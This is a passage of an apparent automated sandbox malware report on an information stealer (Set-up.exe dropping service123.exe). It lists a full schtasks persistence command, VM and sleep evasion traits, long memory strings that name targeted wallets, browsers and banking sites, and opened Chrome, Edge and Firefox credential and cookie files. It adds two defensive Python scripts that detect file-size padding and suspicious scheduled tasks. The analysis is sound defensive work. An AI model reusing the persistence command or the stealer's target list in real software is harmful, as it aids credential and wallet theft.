Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: nripudvfuuhzvedetrih.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: nripudvfuuhzvedetrih.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: nripudvfuuhzvedetrih.dll
Source: C:\Users\user\Desktop\Set-up.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: Set-up.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: Set-up.exe Static file information: File size 10006016 > 1048576
Source: Set-up.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2c7600
Source: Set-up.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x671400
Source: Set-up.exe Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_00668230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 5_2_00668230
Source: Set-up.exe Static PE information: section name: .eh_fram
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: NrIpUDVFuuHZveDEtrIh.dll.0.dr Static PE information: section name: .eh_fram
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_0066A499 push es; iretd 5_2_0066A694
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C988C2A push edx; mov dword ptr [esp], ebx 5_2_6C988C3E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9B4DB0 push eax; mov dword ptr [esp], ebx 5_2_6C9B5018
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C994DC1 push eax; mov dword ptr [esp], ebx 5_2_6C994DD5
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C986E03 push edx; mov dword ptr [esp], ebx 5_2_6C986E17
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C994FA1 push eax; mov dword ptr [esp], ebx 5_2_6C994FB5
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C99285C push edx; mov dword ptr [esp], ebx 5_2_6C992870
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9A8850 push eax; mov dword ptr [esp], ebx 5_2_6C9A8E4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C990852 push eax; mov dword ptr [esp], ebx 5_2_6C990866
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9BE860 push eax; mov dword ptr [esp], ebx 5_2_6C9BE98B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9C29A0 push eax; mov dword ptr [esp], ebx 5_2_6C9C2CD4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9C29A0 push edx; mov dword ptr [esp], ebx 5_2_6C9C2CF3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9F09E0 push eax; mov dword ptr [esp], edi 5_2_6C9F0B5A
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9BEAC0 push eax; mov dword ptr [esp], ebx 5_2_6C9BEBE3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C994BE1 push eax; mov dword ptr [esp], ebx 5_2_6C994BF5
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9804BE push eax; mov dword ptr [esp], ebx 5_2_6C98048A
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9804AD push eax; mov dword ptr [esp], ebx 5_2_6C98048A
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9864A3 push edx; mov dword ptr [esp], ebx 5_2_6C9864B7
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C998451 push 890005EAh; ret 5_2_6C998459
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C980452 push eax; mov dword ptr [esp], ebx 5_2_6C98048A
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9D0460 push eax; mov dword ptr [esp], ebx 5_2_6C9D07FF
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C98A527 push eax; mov dword ptr [esp], ebx 5_2_6C98A53B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C961AAA push eax; mov dword ptr [esp], ebx 5_2_6CA16622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C98A6F7 push eax; mov dword ptr [esp], ebx 5_2_6C98A70B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C966098 push eax; mov dword ptr [esp], ebx 5_2_6CA16622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9940D5 push ecx; mov dword ptr [esp], ebx 5_2_6C9940E9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C966003 push eax; mov dword ptr [esp], ebx 5_2_6CA16AF6
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C966003 push edx; mov dword ptr [esp], edi 5_2_6CA16B36
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9881E5 push edx; mov dword ptr [esp], ebx 5_2_6C9881F9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C980290 push eax; mov dword ptr [esp], ebx 5_2_6C98048A
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\Temp\NrIpUDVFuuHZveDEtrIh.dll
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe
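service123.exe is 314617856 bytes when dumped, which is what the "Drops large PE files" signature refers to. A file that size exceeds the default per-file scan limit of many endpoint products, and the inflation also makes the file hash useless for matching across builds that differ only in filler. The following Python is an added example written for this page, not code from the report or from any scanner: it walks a file in 64 KiB chunks, measures byte entropy per chunk, reports how much of the file is low-entropy filler and where a trailing filler run begins, and returns the file with that run removed so the residual body can be hashed and scanned. The report only gives the dump size, so where the filler sits in the real sample is an assumption, which is why the whole file is scanned rather than just the overlay. The synthetic input is constructed here and is not the dropped file.

```python
"""Inflated-dropper check: how much of a large file is low-entropy filler.

Added example for this page; not code from Joe Sandbox or the sample.
The dump size quoted in the report is real; the synthetic file built by
make_synthetic_sample() is constructed for the demonstration. Where the
filler sits inside the real service123.exe is not stated in the report.
"""
import hashlib
import math
import random
from collections import Counter

CHUNK = 64 * 1024
REPORTED_DUMP_SIZE = 314617856       # service123.exe.0.dr as listed above
LOW_ENTROPY_BITS = 1.0               # below this a chunk is treated as filler


def chunk_entropy(data):
    """Shannon entropy in bits per byte (0.0 for empty or single-valued data)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def padding_profile(data, chunk=CHUNK, threshold=LOW_ENTROPY_BITS):
    """Scan data in fixed chunks and summarise the filler.

    Returns a dict with the total size, chunk count, number of filler
    chunks, the filler ratio, and the offset where an uninterrupted
    trailing run of filler begins (None if the file does not end in filler).
    """
    flags = [chunk_entropy(data[off:off + chunk]) < threshold
             for off in range(0, len(data), chunk)]
    tail = 0
    for is_filler in reversed(flags):
        if not is_filler:
            break
        tail += 1
    return {
        "size": len(data),
        "chunks": len(flags),
        "filler_chunks": sum(flags),
        "filler_ratio": (sum(flags) / len(flags)) if flags else 0.0,
        "filler_tail_start": (len(flags) - tail) * chunk if tail else None,
    }


def strip_trailing_filler(data, chunk=CHUNK, threshold=LOW_ENTROPY_BITS):
    """Return data without its trailing filler run (unchanged if there is none)."""
    start = padding_profile(data, chunk, threshold)["filler_tail_start"]
    return data if start is None else data[:start]


def core_sha256(data):
    """SHA-256 of the file with trailing filler removed, for cross-build matching."""
    return hashlib.sha256(strip_trailing_filler(data)).hexdigest()


def make_synthetic_sample(payload_chunks=3, filler_chunks=20, seed=7):
    """Constructed stand-in: a random 'body' followed by zero padding.

    Not the dropped file; the sizes are small so the demo runs quickly.
    """
    rng = random.Random(seed)
    body = b"MZ" + bytes(rng.getrandbits(8) for _ in range(payload_chunks * CHUNK - 2))
    return body + b"\x00" * (filler_chunks * CHUNK)


if __name__ == "__main__":
    sample = make_synthetic_sample()
    profile = padding_profile(sample)
    print("filler ratio %.2f, trailing filler starts at %s"
          % (profile["filler_ratio"], profile["filler_tail_start"]))
    print("core sha256:", core_sha256(sample))
    print("reported dump is %.1f MiB" % (REPORTED_DUMP_SIZE / 2 ** 20))
```

Against the real dump, read the file from the sandbox's dropped-files archive into memory (300 MB is fine on an analysis box) and run padding_profile() first; a filler ratio near 1.0 with a trailing run tells you the body is small enough to submit to scanners that refused the inflated file, and core_sha256() gives a hash that survives re-padding. If the filler is interleaved rather than trailing, the ratio still tells the story but the strip function will not help; treat that as a signal to unpack the PE sections individually instead.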

Boot Survival

Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Users\user\Desktop\Set-up.exe Process information set: NOOPENFILEERRORBOX
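The schtasks.exe command above (also listed under System Summary) is the persistence mechanism: a task named ServiceData4 that nominally runs once at 00:01, but /ri 1 repeats it every minute and /du 9800:59 keeps that repetition going for 9800 hours, roughly 408 days, while /f silently replaces any existing task of the same name. The /tr path also mixes separators ("Temp\/service123.exe"), which Windows accepts (the two later launches of service123.exe in the process list carry exactly that path) but which is a usable artifact in its own right. The following Python is an added example written for this page, not code from the report, the malware or Sigma: it parses a schtasks command line as it would appear in a Sysmon Event ID 1 or Security 4688 record and flags these traits. The heuristics are the author's and are only loosely modelled on the two Sigma rule titles cited in the Signatures list.

```python
"""Triage of schtasks.exe /create command lines, as captured in process
creation telemetry (Sysmon EID 1, Security 4688).

Added example for this page; not code from Joe Sandbox, Sigma or the
sample. SCHTASKS_CMD is the command line from the report; the scoring
rules are the author's heuristics.
"""
import re

SCHTASKS_CMD = ('"C:\\Windows\\System32\\schtasks.exe" /create /tn "ServiceData4" '
                '/tr "C:\\Users\\user\\AppData\\Local\\Temp\\/service123.exe" '
                '/st 00:01 /du 9800:59 /sc once /ri 1 /f')

_TOKEN_RE = re.compile(r'"[^"]*"|\S+')
# Locations an unprivileged user can write to; a task action here is suspect.
_USER_WRITABLE_RE = re.compile(
    r"\\AppData\\|\\Temp\\|\\Users\\Public\\|%(?:temp|tmp|appdata|localappdata)%", re.I)


def parse_schtasks(cmdline):
    """Return {'image': <exe>, 'switches': {name: value_or_True}}.

    A switch takes the following token as its value unless that token is
    itself a switch; bare flags such as /create and /f map to True.
    """
    tokens = [t.strip('"') for t in _TOKEN_RE.findall(cmdline)]
    switches = {}
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("/"):
            name = tok[1:].lower()
            if i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
                switches[name] = tokens[i + 1]
                i += 2
                continue
            switches[name] = True
        i += 1
    return {"image": tokens[0] if tokens else "", "switches": switches}


def parse_duration(value):
    """'/du HHHH:MM' -> total minutes, or None if absent or malformed."""
    m = re.fullmatch(r"(\d{1,4}):(\d{2})", value or "")
    return int(m.group(1)) * 60 + int(m.group(2)) if m else None


def _text(switches, name):
    """Switch value as a string ('' for absent switches and bare flags)."""
    v = switches.get(name)
    return v if isinstance(v, str) else ""


def assess_schtasks(parsed):
    """List the reasons a /create command line deserves attention.

    An empty list means none of these heuristics fired; it does not mean
    the task is benign.
    """
    sw = parsed["switches"]
    findings = []
    if "create" not in sw:
        return findings
    action = _text(sw, "tr")
    if _USER_WRITABLE_RE.search(action):
        findings.append("action runs from a user-writable Temp/AppData path")
    if "\\/" in action:
        findings.append("action path mixes '\\' and '/' separators (author quirk; Windows accepts it)")
    interval = int(_text(sw, "ri")) if _text(sw, "ri").isdigit() else None
    if _text(sw, "sc").lower() == "once" and interval:
        findings.append("/sc once combined with /ri: a one-shot task that actually recurs")
    duration = parse_duration(_text(sw, "du"))
    if duration and interval:
        launches = duration // interval
        findings.append("repeats every %d min for %d min (~%d days, ~%d launches)"
                        % (interval, duration, duration // 1440, launches))
    if sw.get("f") is True:
        findings.append("/f silently replaces an existing task of the same name")
    return findings


if __name__ == "__main__":
    parsed = parse_schtasks(SCHTASKS_CMD)
    for reason in assess_schtasks(parsed):
        print("-", reason)
```

On a host, the same facts are visible after the fact in the task XML under C:\Windows\System32\Tasks\ServiceData4 (the Repetition element carries the /ri and /du values) and in the Microsoft-Windows-TaskScheduler/Operational log, which is a useful cross-check when the original command line was not captured.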

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\service123.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\service123.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Users\user\Desktop\Set-up.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 809 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 1.1 %
Source: C:\Users\user\Desktop\Set-up.exe TID: 7764 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 8152 Thread sleep count: 809 > 30
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 8152 Thread sleep time: -80900s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696497155j
Source: Set-up.exe Binary or memory string: VMware
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696497155
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: Set-up.exe Binary or memory string: navigatoradatwofactor.xlsbackupsOfficeXuanZhi9OriginmailGraphicsCachexrpWebStorageToastNotificationManagerCompatService WorkerejbalbakoplchlghecdalmeeeajnimhmLGHUBstremiotokencoinMetro\aholpfdialjgjfhomihkjbmgjidlcdnoVisual Studio SetupDropbox.jpgproductionMacromedia.txtLocal StorageCiscoSparkLauncherFACEITuser_dataUTC--2slobs-clientpkgsvcpkg.ElectrumpreferencesAutoHotkeyOlk\SlackEOS-Webcam-UtilitynavigationZWSOFTProcess Hacker 2avaxClickUpBlueStacks XReasonLabs\Blizzarduser_data#2carteira.IdentityService.jappsrvPicturesUXPWindows Server 2012 %wSwallet.datTerminalUpdateResourcenlbmnnijcnlegkjjpcfjclmcfggfefdmbilletera.pwdHotta\optimization_guide_prediction_model_downloadsPowerPointclaveswapiTop PDFSegmentation Platformthumbnailsdoge.pdfCaphyonWindows StoreEpsonSession StorageCanonbinanceViberdaidotContent-Type: multipart/form-data; boundary=----Boundary%lucom.adobe.dunamisUbisoftcodeDisc_Soft_FZE_LLCVodafoneElevatedDiagnosticscacheklnaejjgbibmhlephnhpmaofohgkpgkdBGAHelperLibCredentials.weasisUniSDKegjidjbpglichdcondbcbdnbeeppgdphPackages%d x %defbglgofoippbgcjepnhiblaibcnclgkAdguard_Software_Limited%.2f MB (%.2f GB)hdokiejnpimakedhajhdlcegeplioahdUserBenchmarkformhistory.sqliteFPSChessticketfactorIdentityCachedotnetsrcMotABBYY...Iq-TeamreposDocumentsVirtualBoxAuthcookies.sqlite.ipythonTikTok LIVE StudiointegrationsExodus\MessengerBlendCitraIntel(R)2FAEdgeUpdate360TotalSecurityFlash Playerbalena-etcherAdguard Software LimitedbhhhlbepdkbapadjdnnojkbgioiodbicUnrealEngineDropboxElectronCrashReportsAutoItGraineRealPlayerEpicGamesLauncher\.anacondaHoYoverse\ljfoeinjpaedjfecbmggjgodbgkmjkjkApkProjectsOneAuthConfigToolbarwindowParams.jsonmcohilncbfahbmgdjkbpemcciiolgcgeNetworklinkChaveshared_proto_dbPC HelpSoft Driver Updaterexodus.walletDownloaded InstallationsAMS SoftwarechainookjlbkiijinhpmnjffcofjonbfbgaocDiagnosticsMetaQuotesWindows Server 2012 R2 %wSuser_data#32 FAWindows Live ContactsNVIDIA Corporation\fhmfendgdocmcbmfikdcogofphimnknoAdobejaxSupportAshampoo.android.docbackuptrxApplicationInsightsLibraryWebTorrentarduino-ideGitKrakensidMPC-HCtbs_cache\microAppstronWinRARTerminal Server ClientTencentlogins.jsonAviraportefeuillehpglfhgfnhbgpjdenjgmdgoeiappaflndaoCanva.kdbcanva-updaterNotiondeemix MusicClassicShellkkpllkodjeloidieedojogacfhpaihohbhghoamapcdpbohphigoooaddinpkbaisecretdictionariesVMwarebtcLocal StoreGitHub DesktopPanasonicSidify Music ConverterMSOIdentityCRL.jpegusdblockNeteasehtxsentryFavoritesJDownloader 3.0XamarinTemplate.rtfJDownloader 2.0CorelCiscoSparkbitNotepad++SYACMPC-BERealNetworkswebview2uTorrentExcelAutodeskMegaDownloaderwebviewatomDriverPack NotifiercachesTesterAndroiddexEBWebView.condaMovavi Video ConvertergameAIMPSenhadmkamcknogkgcdfhhbddcghachkejeapMovaviAdaware.jdksPhotoScapeXPro.pngSilhouette AmericaupdatesClcriptReadyForindexWindows 7 %wSexchangeLogitechEADesktopPhotoWorksNeroPsiphon3StreamingVideoProviderVideoDecodeStatsBlackmagic DesigncjelfplplebdjjenllpjcblmjkfcffnePower BI Desktopapp.jsonOverwolfXuanZhikey4.dbUI
Source: Set-up.exe, 00000000.00000002.1992343702.000000000079E000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1484449204.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1992343702.00000000007F4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696497155o
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696497155
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: Set-up.exe, 00000000.00000003.1484449204.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1992343702.00000000007F4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWGv
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696497155f
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696497155s
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: Set-up.exe, 00000000.00000003.1526374059.000000000D25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_00668230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 5_2_00668230
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_0066116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 5_2_0066116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_00661160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 5_2_00661160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_006611A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 5_2_006611A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_006613C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 5_2_006613C9
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C9C8280 cpuid 5_2_6C9C8280
Source: C:\Users\user\Desktop\Set-up.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\Set-up.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Set-up.exe, 00000000.00000002.1992343702.000000000080A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 123.exe

Stealing of Sensitive Information

Source: Yara match File source: 5.2.service123.exe.6c940000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1976708415.0000000003BDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Set-up.exe PID: 7652, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: service123.exe PID: 8148, type: MEMORYSTR
Source: Set-up.exe String found in binary or memory: Electrum
Source: Set-up.exe String found in binary or memory: \ElectronCash\wallets
Source: Set-up.exe, 00000000.00000002.1993669524.000000000193B000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: .node-redOnDeviceHeadSuggestModel\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)Android Open Source Project\Emulator\Movavi Video EditorVS Revo GroupSolidDocumentsSteamCachedData.vscodeCodeMEGAsyncISL Online CacheLogiShrdMega LimitedAVGBrowser.exeHP_Easy_StartmainXpomPowerISOPicWishHabbo LauncherSmartSteamEmukey3.dbsignons.sqliteTechSmithWildTangentWindows ServicesHP Active HealthNVIDIADigiartyuTorrent WebiCloudDriveJxBrowsertastytradewebcachePublishersSquirrelTempMedia Player@
Source: Set-up.exe String found in binary or memory: \com.liberty.jaxx
Source: Set-up.exe String found in binary or memory: \Exodus\backup
Source: Set-up.exe String found in binary or memory: exodus
Source: Set-up.exe String found in binary or memory: Ethereum (UTC)
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
Source: Yara match File source: Process Memory Space: Set-up.exe PID: 7652, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: Process Memory Space: Set-up.exe PID: 7652, type: MEMORYSTR